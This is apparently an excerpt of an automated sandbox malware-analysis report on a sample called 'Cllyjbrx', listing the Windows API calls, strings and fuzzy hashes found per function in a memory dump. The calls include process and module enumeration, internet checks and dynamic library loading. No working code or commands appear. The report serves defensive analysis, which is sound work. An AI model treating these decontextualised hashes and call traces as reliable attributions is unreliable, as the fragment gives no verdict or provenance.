                                                                                              • Opcode Fuzzy Hash: 2f7bc6703029b537cc3c0958fa9f72b3d5fce08f432651dac9d9f0416ab38ddb
                                                                                              • Instruction Fuzzy Hash: E8117C2C700B1087D735EB6DC9C49667BE9AF8D663B058476E44A8F219DB30CC85D6F2
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031BE5F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionFreeInternetLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 2507004976-0
                                                                                              • Opcode ID: 104a434822977e04e7b08ddd7564887a95338df1bb8492c57f98fef11d24af25
                                                                                              • Instruction ID: d0be18192739c63018ae811550e320a690a12b6643380dd0f941a7d632d314d9
                                                                                              • Opcode Fuzzy Hash: 104a434822977e04e7b08ddd7564887a95338df1bb8492c57f98fef11d24af25
                                                                                              • Instruction Fuzzy Hash: 21F0F93DA187489FDB10EBB9E880ADD73B4AF8C711F608436E045EA240DFA5A8058725
                                                                                              APIs
                                                                                              • CLSIDFromProgID.COMBASE ref: 031B6D9E
                                                                                                • Part of subcall function 031A4C60: SysFreeString.OLEAUT32 ref: 031A4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgString
                                                                                              • String ID:
                                                                                              • API String ID: 4225568880-0
                                                                                              • Opcode ID: 6e16a2d5b53366f81455c5909c703f8f932d392ccdda43820a1aeb33030ec0f6
                                                                                              • Instruction ID: 9d02d6454c0630bbc31e658f0f78a82f756dd3d5335de4a83778a8d862e1dc1b
                                                                                              • Opcode Fuzzy Hash: 6e16a2d5b53366f81455c5909c703f8f932d392ccdda43820a1aeb33030ec0f6
                                                                                              • Instruction Fuzzy Hash: CAE0ED3D204B08BFD311EB6ADC42D9EB6ECDB8E640B9204B0E900E7600DBB1AE0080A0
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(20FB1B20,?,00000105), ref: 031A5886
                                                                                                • Part of subcall function 031A5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 031A5AE8
                                                                                                • Part of subcall function 031A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B06
                                                                                                • Part of subcall function 031A5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5B24
                                                                                                • Part of subcall function 031A5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031A5B42
                                                                                                • Part of subcall function 031A5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031A5B8B
                                                                                                • Part of subcall function 031A5ACC: RegQueryValueExA.ADVAPI32(?,031A5D38,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,031A5BD1,?,80000001), ref: 031A5BA9
                                                                                                • Part of subcall function 031A5ACC: RegCloseKey.ADVAPI32(?,031A5BD8,00000000,00000000,00000005,00000000,031A5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031A5BCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                              • String ID:
                                                                                              • API String ID: 2796650324-0
                                                                                              • Opcode ID: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
                                                                                              • Instruction ID: 2714ce670d9a36361ff894420f57f3916a11885aa4c4e42c99b7aa1532cb7fbd
                                                                                              • Opcode Fuzzy Hash: b9746befce64e71ff07d12d308fb9915a3fb36454f89001aea748d68f1661a61
                                                                                              • Instruction Fuzzy Hash: C6E09279A047149FCB10DEACD8C0A5633D8AF0D751F0809A1ED94CF346D7B0D91087D0
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,031C356F,ScanString,03223160,031CB7B8,OpenSession,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,Initialize), ref: 031A7E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                              • Instruction ID: 1420b44c594ba29a2d6c4a41eb02d3d653e333367ba096040f9572dfb63c21d9
                                                                                              • Opcode Fuzzy Hash: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                              • Instruction Fuzzy Hash: 13C08CFE215B000F5E60E9FC1CC81198288098C033B681E61E438CA3C2D71698332020
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID:
                                                                                              • API String ID: 3341692771-0
                                                                                              • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                              • Instruction ID: c340adfc147778991e2f2e80d2cefda0b7ae1791c978a129f73b39be9e840048
                                                                                              • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                              • Instruction Fuzzy Hash: B6C012AE600A3067EB61D69EACC075262CCDB0D296F1804A19408DB355E7A0D8004290
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID:
                                                                                              • API String ID: 3341692771-0
                                                                                              • Opcode ID: d54247db1b258156244adbb806ac4dd0cd010764ffdd17f74803e917e64435c1
                                                                                              • Instruction ID: d6a4fd4dc15c480c5348ccd84f4cea85b339974e0d9d284a1cc53a1c1be76d7b
                                                                                              • Opcode Fuzzy Hash: d54247db1b258156244adbb806ac4dd0cd010764ffdd17f74803e917e64435c1
                                                                                              • Instruction Fuzzy Hash: 31C0127C105B057FAB08AB3A5E4057A92189D8D24375444A59911CC114EB68D4415524
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Eventtime
                                                                                              • String ID:
                                                                                              • API String ID: 2982266575-0
                                                                                              • Opcode ID: 2022fd3735866528ccb1e540448191d7ad5afe6b570bb6c4e837c8f667982d46
                                                                                              • Instruction ID: 248f693e043ba0ee0d571a8f19dd3c9d83027e6358007c543fb6a4cd214ef966
                                                                                              • Opcode Fuzzy Hash: 2022fd3735866528ccb1e540448191d7ad5afe6b570bb6c4e837c8f667982d46
                                                                                              • Instruction Fuzzy Hash: F3C048B53A07802BFA10A6A96CC2F225A9C9359B12F101015B609EE2C1D7E658018AA4
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004), ref: 031A15E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: e6301ea9cf52f523278b67c146afea63858b223f51adbe9e03a8188e8da96b10
                                                                                              • Instruction ID: fd0e4d27573ff659c1bcf7fc8944bf57e8fcc58cb7cd80b759baea7e70c6813d
                                                                                              • Opcode Fuzzy Hash: e6301ea9cf52f523278b67c146afea63858b223f51adbe9e03a8188e8da96b10
                                                                                              • Instruction Fuzzy Hash: 0CF049F4711B006FDB19EFBAAD443017AD2E78E245F24D139D609DB39CE7B194018B00
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 031A16A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 01eea270bc588144efd72f11827681b51a8c3823e56c01357418ff9d3676e340
                                                                                              • Instruction ID: e195c64c9652385b45d03662b13c4e37a0cca0a334ad15251da62531d09d4b57
                                                                                              • Opcode Fuzzy Hash: 01eea270bc588144efd72f11827681b51a8c3823e56c01357418ff9d3676e340
                                                                                              • Instruction Fuzzy Hash: 44F09AB6A00F957BD720EE5EAC84B82BB94FB18321F154139EA089B344D7B1AC008794
                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 031A1704
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: 3ed22fb411af90ac9cca8df743a390b388d21760d1f2fe02f1c16e68c7044243
                                                                                              • Instruction ID: 845a432a4ae1017cfb6ca84c9a68cbe033e896c34f9d44086d227bc4f96e68af
                                                                                              • Opcode Fuzzy Hash: 3ed22fb411af90ac9cca8df743a390b388d21760d1f2fe02f1c16e68c7044243
                                                                                              • Instruction Fuzzy Hash: F9E0267D300B007FE7209A7D5D40B12BBC9EB4C272F245575F201CB2D1C3A0D8008360
                                                                                              APIs
                                                                                              • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031A5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 031A5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 031A5BFB
                                                                                              • lstrlen.KERNEL32(00000000), ref: 031A5C26
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5C6D
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5C7D
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 031A5CA5
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CB5
                                                                                              • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CDB
                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 031A5CEB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                              • String ID: .
                                                                                              • API String ID: 1599918012-248832578
                                                                                              • Opcode ID: e1d207cfd59d9a3355d61464253f03734f19f47a71b5373a3b145886073fdf91
                                                                                              • Instruction ID: 469de7025c163abee040b1d9fed955959f0a269cc12e1dd07ed4937a7cc7bf12
                                                                                              • Instruction Fuzzy Hash: D431947DE4476C3BEB25D6BC8C45BDEB6AD9B0D381F0401F2A644E6089E774DE888B50
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,031BADA3,?,?,031BAE35,00000000,031BAF11), ref: 031BAB30
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 031BAB48
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 031BAB5A
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 031BAB6C
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 031BAB7E
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 031BAB90
                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 031BABA2
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 031BABB4
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 031BABC6
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 031BABD8
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 031BABEA
                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 031BABFC
                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 031BAC0E
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 031BAC20
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 031BAC32
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 031BAC44
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 031BAC56
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                              • API String ID: 667068680-597814768
                                                                                              • Opcode ID: d9dc3150b8e456fdb34e11f8e484d3cb132e42c9ee8b804d67258c64b6898c63
                                                                                              • Instruction ID: 0646a5d3d52cc7023fa40afa187535ec76a4bc1593474fe39d0d1cfb11c48532
                                                                                              • Instruction Fuzzy Hash: EA3101B8644750AFDF10EFBCEC89AAD77B8AF2D2027045961E814DF24AE374A450CB51
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 031B6EDE
                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 031B6EEF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 031B6EFF
                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 031B6F0F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 031B6F1F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 031B6F2F
                                                                                              • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 031B6F3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                              • API String ID: 667068680-2233174745
                                                                                              • Opcode ID: ed87545d6584ef5a52a763ce8bc2d2ae29e00973059eeaf8268c136d0fb74543
                                                                                              • Instruction ID: 1049c17b129bc2e787bd6edc0e0eb9c4fd97038785cb5feca623bb9fbbee7350
                                                                                              • Instruction Fuzzy Hash: 41F04CFA6587807FEA04FB785C928AA2B78A93C5073082C1DF91599987E779D8448B70
                                                                                              APIs
                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 031A28CE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                              • API String ID: 2030045667-32948583
                                                                                              • Opcode ID: ad446a0b1a5ba0e2f7eee0332624210fe576cd9c551fe1e4249b01706b2bf381
                                                                                              • Instruction ID: 57d72bc7ddde31a5b2728a33fdb9fc0f5ee83c5be594650a2ab81b235b0cfd99
                                                                                              • Instruction Fuzzy Hash: 98A1D838A047648BDB21EA2CCC84BD8B6F4EB0D752F1448E5E949AB281CB7589C7CB51
                                                                                              Strings
                                                                                              • The unexpected small block leaks are:, xrefs: 031A2707
                                                                                              • , xrefs: 031A2814
                                                                                              • Unexpected Memory Leak, xrefs: 031A28C0
                                                                                              • 7, xrefs: 031A26A1
                                                                                              • An unexpected memory leak has occurred. , xrefs: 031A2690
                                                                                              • bytes: , xrefs: 031A275D
                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 031A2849
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                              • API String ID: 0-2723507874
                                                                                              • Opcode ID: 7f857ef551ca2d55c22f350df488b8bd6db73272bd588353ca6fe96b3d7cfea6
                                                                                              • Instruction ID: 2231315e52af583b6564cfaed6dcf2b7a9e5e93bb09cfa18c7d86eaed24f3129
                                                                                              • Instruction Fuzzy Hash: 6D71D738A047688FDB21DA2CCC84BD8BAF4EB0D752F1448E5E54DEB241DB758AC6CB51
                                                                                              APIs
                                                                                              • lstrcpyn.KERNEL32(?,?,?), ref: 031A596C
                                                                                              • lstrcpyn.KERNEL32(?,?,0000005C,kernel32.dll), ref: 031A59D0
                                                                                              • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 031A5A06
                                                                                              • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 031A5A6B
                                                                                              • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 031A5A77
                                                                                              • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 031A5A99
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$lstrlen
                                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                              • API String ID: 4046762626-1565342463
                                                                                              • Opcode ID: c63591987aeeae03e60ffcc5e2ea22094fde71de9341a193948efe6db4ecf5dc
                                                                                              • Instruction ID: 20e9d213faf093660da88840d5ec49aaf69fb9a0de71157b0e43839f26c12848
                                                                                              • Instruction Fuzzy Hash: BA41637DE04A19BFDB20DAECCC88ADEB7BDAF0D252F1445A6D584DB241D770DA408B50
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000000,031AC08B,?,?,00000000,00000000), ref: 031ABDF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocaleThread
                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                              • API String ID: 635194068-2493093252
                                                                                              • Opcode ID: 47eb040b796b09de8e8b356345a84d38b948202f80cb8616b1913285d39742d8
                                                                                              • Instruction ID: 366eca345297a49900364e2ae61c4fa1d436df14b221be630ab82113e2bc8a55
                                                                                              • Instruction Fuzzy Hash: 25614A3DB00B489BCB00EBACED90A9F76A69F8C302F509475A501EF745CB79DA09D791
                                                                                              APIs
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031BB000
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 031BB017
                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 031BB0AB
                                                                                              • IsBadReadPtr.KERNEL32(?,00000002), ref: 031BB0B7
                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 031BB0CB
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: Read$HandleModule
                                                                                              • String ID: KernelBase$LoadLibraryExA
                                                                                              • API String ID: 2226866862-113032527
                                                                                              • Opcode ID: a54e10121a73725663ad751ca1afe894334bf8ebd560171999239c4854fefdc6
                                                                                              • Instruction ID: d555c034065b9aebe9c42f48a46df4bd163e72f73424030f850b57c206f3e4db
                                                                                              • Instruction Fuzzy Hash: 19317475A08705BBDB20DB69CC85FA9B7BCAF0D754F048154FA64AB6C1D370A940CBA0
                                                                                              APIs
                                                                                                • Part of subcall function 031AAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 031AAD59
                                                                                                • Part of subcall function 031AAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 031AAD7D
                                                                                                • Part of subcall function 031AAD3C: GetModuleFileNameA.KERNEL32(032267F8,?,00000105,?,?,00000105), ref: 031AAD98
                                                                                                • Part of subcall function 031AAD3C: LoadStringA.USER32(00000000,031A6860,?,00000100), ref: 031AAE2E
                                                                                              • CharToOemA.USER32(?,?), ref: 031AAEFB
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 031AAF18
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031AAF1E
                                                                                              • GetStdHandle.KERNEL32(000000F4,031AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031AAF33
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,031AAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 031AAF39
                                                                                              • LoadStringA.USER32(00000000,031A67D8,?,00000040), ref: 031AAF5B
                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 031AAF71
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 185507032-0
                                                                                              • Opcode ID: 752c5c609a5d9619336dbee9e19652a50ae65012b93fe2e0096a8ceb0bdd3acc
                                                                                              • Instruction ID: 2828c78888addf563511691ae98986d789c8490878d0dfa686b4456e89418535
                                                                                              • Instruction Fuzzy Hash: 14115ABE518B00BFD200FBA8DC85F9F77ACAF48602F444925B754DA0E1DB74E9448762
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423,?,?,?,?,?,?,?,031A44CE,031A2CF3), ref: 031A4395
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423,?,?,?,?,?,?,?,031A44CE), ref: 031A439B
                                                                                              • GetStdHandle.KERNEL32(000000F5,031A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423), ref: 031A43B0
                                                                                              • WriteFile.KERNEL32(00000000,000000F5,031A43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,031A4423), ref: 031A43B6
                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,031CE754,00000000), ref: 031A43D4
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$Message
                                                                                              • String ID: Runtime error at 00000000
                                                                                              • API String ID: 1570097196-1393363852
                                                                                              • Opcode ID: c59f2a776ffa5e4a9a4322a442fc40653225d2e1734f4a2ae6f2a1479cb803ac
                                                                                              • Instruction ID: b92b165f0c0f5a946658c749c895a95d3c3debcb9ba76b0dc0ca4771a273bda7
                                                                                              • Instruction Fuzzy Hash: D7F0246C6957907BF720F2BA6C0AF5D265C4B1CF23F944319F2209C0C68BE040C48772
                                                                                              APIs
                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 031AE625
                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 031AE641
                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 031AE67A
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 031AE6F7
                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 031AE710
                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 031AE745
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                              • String ID:
                                                                                              • API String ID: 351091851-0
                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(?,00000000,031AACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 031AAB2F
                                                                                              Memory Dump Source
